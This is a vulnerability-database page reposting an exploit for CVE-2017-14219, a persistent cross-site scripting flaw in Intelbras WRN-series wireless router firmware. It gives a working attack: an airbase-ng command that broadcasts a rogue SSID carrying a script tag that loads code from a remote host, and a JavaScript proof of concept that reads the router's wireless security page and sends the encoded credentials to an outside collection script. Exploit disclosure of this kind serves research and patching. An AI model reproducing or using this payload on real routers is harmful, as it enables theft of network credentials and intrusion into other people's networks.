Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Roteador Wirelsss Intelbras WRN150 Cross Site Scripting

Related Vulnerabilities: CVE-2017-14219  
Publish Date: 08 Sep 2017
Author: Elber Tavares
Source 
                							

                # Exploit Title: XSS persistent on intelbras router with firmware WRN 250
# Date: 07/09/2017
# Exploit Author: Elber Tavares
# Vendor Homepage: http://intelbras.com.br/
# Version: Intelbras Wireless N 150Mbps - WRN 240
# Tested on: kali linux, windows 7, 8.1, 10
 
# CVE-2017-14219
 
For more info:
 
 
http://whiteboyz.xyz/xss-roteador-intelbras-wrn-240html
 
URL VULN: http://10.0.0.1/userRpm/popupSiteSurveyRpm.htm
 
Payload: </script><script src='//elb.me'>
 
"elb.me contains the malicious code on index"
 
airbase-ng -e "</script><script src='//elb.me'>" -c 8 -v wlan0mon
 
//requires an php script to get the logs
 
PoC:
 
var rawFile = new XMLHttpRequest();
rawFile.onreadystatechange = function() {
       alert(rawFile.responseText);
       var base64 = rawFile.responseText.split('>')[1].split("/SCRIPT")[0];
       //seleiciona a parte da pA!gina com as credenciais
       new Image().src="https://elb.me/cookie.php?ck="+btoa(base64);
       //envia as credenciais encodadas em base64
};
rawFile.open("GET", "http://10.0.0.1/userRpm/WlanSecurityRpm.htm", true);
//pega a source da pA!gina /popupSiteSurveyRpm.htm
rawFile.send();


<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started